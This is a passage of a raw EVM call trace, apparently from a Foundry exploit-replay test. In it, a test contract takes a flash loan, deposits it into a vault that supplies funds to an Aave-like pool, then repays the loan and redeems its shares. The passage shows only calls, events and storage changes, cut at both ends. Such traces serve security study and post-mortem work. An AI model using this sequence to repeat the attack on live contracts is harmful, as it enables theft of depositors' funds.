    │   │   │   │   │   │   │   │   ├─ [924] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [375] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000a816ce7d6cbd
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000a816ce7d6cbd
    │   │   │   │   │   │   │   │   ├─ [5499] 0xf4a0039F2d4a2EaD5216AbB6Ae4C4C3AA2dB9b82::calculateInterestRates((0, 194263946041 [1.942e11], 0, 68904639576 [6.89e10], 74078819311737 [7.407e13], 52881911184258890734811612 [5.288e25], 1000, 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 0x625E7708f30cA75bfd92586e17077590C60eb4cD)) [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [1226] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::balanceOf(0x625E7708f30cA75bfd92586e17077590C60eb4cD) [staticcall]
    │   │   │   │   │   │   │   │   │   │   ├─ [529] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::balanceOf(0x625E7708f30cA75bfd92586e17077590C60eb4cD) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 113289515691693 [1.132e14]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 113289515691693 [1.132e14]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000052d3dff6f59d735f691fe0000000000000000000000000000000000000000002b2ccfebb246f9055e08370000000000000000000000000000000000000000000e8733ea72047c9af041ba
    │   │   │   │   │   │   │   │   ├─ emit ReserveDataUpdated(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 6258279247219759135494654 [6.258e24], param2: 52195429828413756897364023 [5.219e25], param3: 17563438627310055178912186 [1.756e25], param4: 1014182544046923627575866516 [1.014e27], param5: 1023095144527329322798772856 [1.023e27])
    │   │   │   │   │   │   │   │   ├─ [12671] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transferFrom(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0x625E7708f30cA75bfd92586e17077590C60eb4cD, 194263946041 [1.942e11])
    │   │   │   │   │   │   │   │   │   ├─ [11997] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transferFrom(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0x625E7708f30cA75bfd92586e17077590C60eb4cD, 194263946041 [1.942e11]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, to: 0x625E7708f30cA75bfd92586e17077590C60eb4cD, value: 194263946041 [1.942e11])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0x37822bc9d1e42633e7a10b46af9482f8c36329728a2f80f4a9a3fca27d86e879: 0x000000000000000000000000000000000000000000000000000067094556eead → 0x00000000000000000000000000000000000000000000000000006736805f81e6
    │   │   │   │   │   │   │   │   │   │   │   @ 0xec113264939d835dc429b14962832b2da91d354062360009821e1965bba1be36: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffff9f561ab422 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffff721b1220e9
    │   │   │   │   │   │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0x0000000000000000000000000000000000000000000000000000002d3b089339 → 0
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   ├─ [11154] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::mint(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194263946041 [1.942e11], 1014182544046923627575866516 [1.014e27])
    │   │   │   │   │   │   │   │   │   ├─ [10587] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::mint(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194263946041 [1.942e11], 1014182544046923627575866516 [1.014e27]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   ├─ [2973] 0x929EC64c34a17401F460460D4B9390518E5B473e::handleAction(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 184815907073213 [1.848e14], 0)
    │   │   │   │   │   │   │   │   │   │   │   ├─ [2319] 0xaad324f7e4Dd50C6b105820f8a877eE2DCBFA789::handleAction(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 184815907073213 [1.848e14], 0) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, value: 194263946041 [1.942e11])
    │   │   │   │   │   │   │   │   │   │   ├─ emit Mint(param0: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param2: 194263946041 [1.942e11], param3: 0, param4: 1014182544046923627575866516 [1.014e27])
    │   │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   │   @ 0xc2e4d1d4d5cc5ac5f3c9d78db895f91f8e825342406c676d70f0cd57d2b69f5f: 0x000000000346e981e0ac3276197b749400000000000000000000000000000000 → 0x000000000346e981e0ac3276197b749400000000000000000000002c991c1e0a
    │   │   │   │   │   │   │   │   │   │   │   @ 54: 0x0000000000000000000000000000000000000000000000000000a816ce7d6cbd → 0x0000000000000000000000000000000000000000000000000000a84367998ac7
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   │   │   │   │   ├─ emit ReserveUsedAsCollateralEnabled(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96)
    │   │   │   │   │   │   │   │   ├─ emit Supply(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param2: 0x0000000000000000000000000000000000000000, param3: 1456264980866434195646133652057223631443830693526 [1.456e48], param4: 194263946041 [1.942e11])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e55: 0x00000000000e8b0eb581a83ff5fb036d00000000034e48d2eaf49e4bc9b17278 → 0x00000000000e8733ea72047c9af041ba00000000034e48d2eaf49e4bc9b17278
    │   │   │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e56: 0x00000000000000000000020063a590af00000000002b2d4b45143b7170bf606e → 0x00000000000000000000020063a590af00000000002b2ccfebb246f9055e0837
    │   │   │   │   │   │   │   │   │   @ 0x3e93b99deab8fa8b6a363830758cb0270dc6ca5cd557b019a86bf7b25a3dd4e7: 0 → 32
    │   │   │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e54: 0x0000000000052ffc9dad08e9aaedad5b000000000346e981e0ac3276197b7494 → 0x0000000000052d3dff6f59d735f691fe000000000346e981e0ac3276197b7494
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1844317480751 [1.844e12])
    │   │   │   │   │   ├─ emit Deposit(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 194263946041 [1.942e11], param3: 1844317480751 [1.844e12])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000000000001ad69e3672f
    │   │   │   │   │   │   @ 0x3e93b99deab8fa8b6a363830758cb0270dc6ca5cd557b019a86bf7b25a3dd4e7: 0 → 32
    │   │   │   │   │   │   @ 3: 0x0000000000000000000000000000000000000000000000000000003165af9ccc → 0x000000000000000000000000000000000000000000000000000001decf9303fb
    │   │   │   │   │   │   @ 0xa6e2623793b94b1f0414b6b91c6c42fd18905fbe0a934b0e9b8e134f4c440179: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd2c4f76cc6
    │   │   │   │   │   └─ ← [Return] 1844317480751 [1.844e12]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xa6e2623793b94b1f0414b6b91c6c42fd18905fbe0a934b0e9b8e134f4c440179: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   @ 36: 0 → 0x000000000000000000000000000000000000000000000000000001ad69e3672f
    │   │   │   │   └─ ← [Return] 0x439148f0bbc682ca079e46d6e2c2f0c1e3b820f1a291b069d8882abf8cf18dd9
    │   │   │   ├─ [25771] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194283372435 [1.942e11])
    │   │   │   │   ├─ [25097] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194283372435 [1.942e11]) [delegatecall]
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, value: 194283372435 [1.942e11])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xa6e2623793b94b1f0414b6b91c6c42fd18905fbe0a934b0e9b8e134f4c440179: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd2c4f76cc6 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffa588c66d33
    │   │   │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0x0000000000000000000000000000000000000000000000000000002d3c30ff93 → 0
    │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0 → 0x0000000000000000000000000000000000000000000000000000002d3c30ff93
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [1226] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [staticcall]
    │   │   │   │   ├─ [529] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 194283372435 [1.942e11]
    │   │   │   │   └─ ← [Return] 194283372435 [1.942e11]
    │   │   │   ├─ [53224] 0x794a61358D6845594F94dc1DB02A252b5b4814aD::supply(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194283372435 [1.942e11], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0)
    │   │   │   │   ├─ [52660] 0xDF9e4ABdbd94107932265319479643D3B05809dc::supply(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 194283372435 [1.942e11], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0) [delegatecall]
    │   │   │   │   │   ├─ [51412] 0xC603A9E957482298738EA65aA24e61b38859B48D::1913f161(000000000000000000000000000000000000000000000000000000000000003400000000000000000000000000000000000000000000000000000000000000363e93b99deab8fa8b6a363830758cb0270dc6ca5cd557b019a86bf7b25a3dd4e7000000000000000000000000b97ef9ef8734c71904d8002f8b6bc66dd9c48a6e0000000000000000000000000000000000000000000000000000002d3c30ff93000000000000000000000000ff152e21c5a511c478ed23d1b89bb9391be6de960000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   │   ├─ [968] 0xFCCf3cAbbe80101232d343252614b6A3eE81C989::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   │   ├─ [419] 0x81387c40EB75acB02757C1Ae55D5936E78c9dEd3::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000041da786a480b
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000041da786a480b
    │   │   │   │   │   │   ├─ [3176] 0x307ffe186F84a3bc2613D1eA417A5737D69A7007::getSupplyData() [staticcall]
    │   │   │   │   │   │   │   ├─ [2615] 0x52A1CeB68Ee6b7B5D13E0376A1E0E4423A8cE26e::getSupplyData() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000100653c0a7000000000000000000000000000000000000000000000000000000100b095c580000000000000000000000000000000000000000002bbe2e26496e04a670b9dc00000000000000000000000000000000000000000000000000000000639b2002
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000100653c0a7000000000000000000000000000000000000000000000000000000100b095c580000000000000000000000000000000000000000002bbe2e26496e04a670b9dc00000000000000000000000000000000000000000000000000000000639b2002
    │   │   │   │   │   │   ├─ [924] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   │   ├─ [375] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000a84367998ac7
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000a84367998ac7
    │   │   │   │   │   │   ├─ [5499] 0xf4a0039F2d4a2EaD5216AbB6Ae4C4C3AA2dB9b82::calculateInterestRates((0, 194283372435 [1.942e11], 0, 68904639576 [6.89e10], 74078819311737 [7.407e13], 52881911184258890734811612 [5.288e25], 1000, 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 0x625E7708f30cA75bfd92586e17077590C60eb4cD)) [staticcall]
    │   │   │   │   │   │   │   ├─ [1226] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::balanceOf(0x625E7708f30cA75bfd92586e17077590C60eb4cD) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [529] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::balanceOf(0x625E7708f30cA75bfd92586e17077590C60eb4cD) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 113483779637734 [1.134e14]
    │   │   │   │   │   │   │   │   └─ ← [Return] 113483779637734 [1.134e14]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000052a817cd97587093038830000000000000000000000000000000000000000002b2c54d07c40744273bc9d0000000000000000000000000000000000000000000e835b10c1d056839de4e9
    │   │   │   │   │   │   ├─ emit ReserveDataUpdated(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 6245357116690132989130883 [6.245e24], param2: 52193158918130835580501149 [5.219e25], param3: 17545271345046684644009193 [1.754e25], param4: 1014182544046923627575866516 [1.014e27], param5: 1023095144527329322798772856 [1.023e27])
    │   │   │   │   │   │   ├─ [8671] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::transferFrom(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0x625E7708f30cA75bfd92586e17077590C60eb4cD, 194283372435 [1.942e11])
    │   │   │   │   │   │   │   ├─ [7997] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::transferFrom(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0x625E7708f30cA75bfd92586e17077590C60eb4cD, 194283372435 [1.942e11]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, to: 0x625E7708f30cA75bfd92586e17077590C60eb4cD, value: 194283372435 [1.942e11])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x37822bc9d1e42633e7a10b46af9482f8c36329728a2f80f4a9a3fca27d86e879: 0x00000000000000000000000000000000000000000000000000006736805f81e6 → 0x00000000000000000000000000000000000000000000000000006763bc908179
    │   │   │   │   │   │   │   │   │   @ 0xec113264939d835dc429b14962832b2da91d354062360009821e1965bba1be36: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffff721b1220e9 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffff44dee12156
    │   │   │   │   │   │   │   │   │   @ 0x48ab1c212394022d45677e5dab2bd184d75034a1eeb669ebe093cc603fe260e3: 0x0000000000000000000000000000000000000000000000000000002d3c30ff93 → 0
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [13954] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::mint(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194283372435 [1.942e11], 1014182544046923627575866516 [1.014e27])
    │   │   │   │   │   │   │   ├─ [13387] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::mint(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 194283372435 [1.942e11], 1014182544046923627575866516 [1.014e27]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ [2973] 0x929EC64c34a17401F460460D4B9390518E5B473e::handleAction(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 185007454390983 [1.85e14], 191547317770 [1.915e11])
    │   │   │   │   │   │   │   │   │   ├─ [2319] 0xaad324f7e4Dd50C6b105820f8a877eE2DCBFA789::handleAction(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 185007454390983 [1.85e14], 191547317770 [1.915e11]) [delegatecall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   │   │   └─ ← [Return]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, value: 194283372435 [1.942e11])
    │   │   │   │   │   │   │   │   ├─ emit Mint(param0: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param2: 194283372435 [1.942e11], param3: 0, param4: 1014182544046923627575866516 [1.014e27])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 54: 0x0000000000000000000000000000000000000000000000000000a84367998ac7 → 0x0000000000000000000000000000000000000000000000000000a87001d9effc
    │   │   │   │   │   │   │   │   │   @ 0xc2e4d1d4d5cc5ac5f3c9d78db895f91f8e825342406c676d70f0cd57d2b69f5f: 0x000000000346e981e0ac3276197b749400000000000000000000002c991c1e0a → 0x000000000346e981e0ac3276197b7494000000000000000000000059335c833f
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ emit Supply(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, param2: 0x0000000000000000000000000000000000000000, param3: 1456264980866434195646133652057223631443830693526 [1.456e48], param4: 194283372435 [1.942e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e54: 0x0000000000052d3dff6f59d735f691fe000000000346e981e0ac3276197b7494 → 0x0000000000052a817cd9758709303883000000000346e981e0ac3276197b7494
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e56: 0x00000000000000000000020063a590af00000000002b2ccfebb246f9055e0837 → 0x00000000000000000000020063a590af00000000002b2c54d07c40744273bc9d
    │   │   │   │   │   │   │   @ 0x2889eaa22747c352a3ff649cf4e08b28f365682fd55aaed4ce267db314fb2e55: 0x00000000000e8733ea72047c9af041ba00000000034e48d2eaf49e4bc9b17278 → 0x00000000000e835b10c1d056839de4e900000000034e48d2eaf49e4bc9b17278
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ emit FlashLoan(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param3: 194263946041 [1.942e11])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 36: 0 → 0x000000000000000000000000000000000000000000000000000001ad69e3672f
    │   │   │   │   @ 0x3e93b99deab8fa8b6a363830758cb0270dc6ca5cd557b019a86bf7b25a3dd4e7: 32 → 0
    │   │   │   │   @ 0xa6e2623793b94b1f0414b6b91c6c42fd18905fbe0a934b0e9b8e134f4c440179: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd2c4f76cc6 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffa588c66d33
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   ├─ [105766] 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96::redeem(1844317480751 [1.844e12], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [3089] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [staticcall]
    │   │   │   │   ├─ [2537] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::balanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   │   │   ├─ [1340] 0x794a61358D6845594F94dc1DB02A252b5b4814aD::getReserveNormalizedIncome(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E) [staticcall]
    │   │   │   │   │   │   ├─ [788] 0xDF9e4ABdbd94107932265319479643D3B05809dc::getReserveNormalizedIncome(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000346e981e0ac3276197b7494
    │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000346e981e0ac3276197b7494
    │   │   │   │   │   └─ ← [Return] 388547318477 [3.885e11]
    │   │   │   │   └─ ← [Return] 388547318477 [3.885e11]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 1844317480751 [1.844e12])
    │   │   │   ├─ [67806] 0x794a61358D6845594F94dc1DB02A252b5b4814aD::withdraw(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 368503794025 [3.685e11], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96)
    │   │   │   │   ├─ [67245] 0xDF9e4ABdbd94107932265319479643D3B05809dc::withdraw(0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 368503794025 [3.685e11], 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   │   │   ├─ [402] 0xa97684ead0e402dC232d5A977953DF7ECBaB3CDb::getPriceOracle() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0xEBd36016B3eD09D4693Ed4251c67Bd858c3c7C9C
    │   │   │   │   │   ├─ [64624] 0xC603A9E957482298738EA65aA24e61b38859B48D::186dea44(0000000000000000000000000000000000000000000000000000000000000034000000000000000000000000000000000000000000000000000000000000003600000000000000000000000000000000000000000000000000000000000000373e93b99deab8fa8b6a363830758cb0270dc6ca5cd557b019a86bf7b25a3dd4e7000000000000000000000000b97ef9ef8734c71904d8002f8b6bc66dd9c48a6e00000000000000000000000000000000000000000000000000000055cc89a969000000000000000000000000ff152e21c5a511c478ed23d1b89bb9391be6de96000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000ebd36016b3ed09d4693ed4251c67bd858c3c7c9c0000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   │   ├─ [968] 0xFCCf3cAbbe80101232d343252614b6A3eE81C989::scaledTotalSupply() [staticcall]
    │   │   │   │   │   │   │   ├─ [419] 0x81387c40EB75acB02757C1Ae55D5936E78c9dEd3::scaledTotalSupply() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000041da786a480b
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000041da786a480b
    │   │   │   │   │   │   ├─ [3176] 0x307ffe186F84a3bc2613D1eA417A5737D69A7007::getSupplyData() [staticcall]
    │   │   │   │   │   │   │   ├─ [2615] 0x52A1CeB68Ee6b7B5D13E0376A1E0E4423A8cE26e::getSupplyData() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000100653c0a7000000000000000000000000000000000000000000000000000000100b095c580000000000000000000000000000000000000000002bbe2e26496e04a670b9dc00000000000000000000000000000000000000000000000000000000639b2002
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000100653c0a7000000000000000000000000000000000000000000000000000000100b095c580000000000000000000000000000000000000000002bbe2e26496e04a670b9dc00000000000000000000000000000000000000000000000000000000639b2002
    │   │   │   │   │   │   ├─ [1146] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::scaledBalanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [staticcall]
    │   │   │   │   │   │   │   ├─ [626] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::scaledBalanceOf(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96) [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000059335c833f
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000059335c833f
    │   │   │   │   │   │   ├─ [5499] 0xf4a0039F2d4a2EaD5216AbB6Ae4C4C3AA2dB9b82::calculateInterestRates((0, 0, 368503794025 [3.685e11], 68904639576 [6.89e10], 74078819311737 [7.407e13], 52881911184258890734811612 [5.288e25], 1000, 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, 0x625E7708f30cA75bfd92586e17077590C60eb4cD)) [staticcall]
    │   │   │   │   │   │   │   ├─ [1226] 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E::balanceOf(0x625E7708f30cA75bfd92586e17077590C60eb4cD) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [529] 0xa3fa3D254bf6aF295b5B22cC6730b04144314890::balanceOf(0x625E7708f30cA75bfd92586e17077590C60eb4cD) [delegatecall]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 113678063010169 [1.136e14]
    │   │   │   │   │   │   │   │   └─ ← [Return] 113678063010169 [1.136e14]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000052fb4056245c12e0477a60000000000000000000000000000000000000000002b2d3e87ffc00b649c08480000000000000000000000000000000000000000000e8aa8ccddcd0f94e04246
    │   │   │   │   │   │   ├─ emit ReserveDataUpdated(param0: 0xB97EF9Ef8734C71904D8002F8b6Bc66Dd9c48a6E, param1: 6269901124650500828198822 [6.269e24], param2: 52197470233053227885791304 [5.219e25], param3: 17579761864425823086330438 [1.757e25], param4: 1014182544046923627575866516 [1.014e27], param5: 1023095144527329322798772856 [1.023e27])
    │   │   │   │   │   │   ├─ [36225] 0x625E7708f30cA75bfd92586e17077590C60eb4cD::burn(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 368503794025 [3.685e11], 1014182544046923627575866516 [1.014e27])
    │   │   │   │   │   │   │   ├─ [35661] 0xa5ba6E5EC19a1Bf23C857991c857dB62b2Aa187B::burn(0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 0xfF152e21C5A511c478ED23D1b89Bb9391bE6de96, 368503794025 [3.685e11], 1014182544046923627575866516 [1.014e27]) [delegatecall]
